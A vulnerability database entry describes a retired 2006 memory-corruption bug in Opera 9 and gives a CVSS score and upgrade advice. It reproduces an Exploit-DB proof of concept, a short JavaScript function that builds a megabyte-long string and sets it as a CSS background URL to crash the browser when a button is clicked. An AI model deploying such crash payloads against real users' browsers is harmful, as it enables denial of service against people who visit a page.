Opera Web Browser Memory-Corruption Vulnerability

vendor:

Opera Web Browser

by:

SecurityFocus

7.5

CVSS

HIGH

Memory-Corruption

119

CWE

Product Name: Opera Web Browser

Affected Version From: Opera 9

Affected Version To: Opera 9

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Opera Web Browser Memory-Corruption Vulnerability

Opera Web Browser is prone to a memory-corruption vulnerability. A remote attacker may trigger this issue by enticing a user to visit a malicious website. This issue has been reported in Opera 9. Other versions may be vulnerable as well. This BID has been retired because the vendor reported that this issue is a duplicate of BID 18585 (Opera Malicious HTML Processing Denial of Service Vulnerability). An attacker can exploit this vulnerability by enticing a user to visit a malicious website and clicking a button which may crash the browser.

Mitigation:

Upgrade to the latest version of Opera Web Browser.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19166/info

Opera Web Browser is prone to a memory-corruption vulnerability.

A remote attacker may trigger this issue by enticing a user to visit a malicious website.

This issue has been reported in Opera 9. Other versions may be vulnerable as well.

This BID has been retired because the vendor reported that this issue is a duplicate of BID 18585 (Opera Malicious HTML Processing Denial of Service Vulnerability).

function Demo() {
	var a = document.createElement('a');
	var b = 'XXXX';
	while (b.length <= 1024*1024) b+=b;
	a.style.background = 'url(https://' + b + ')';
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>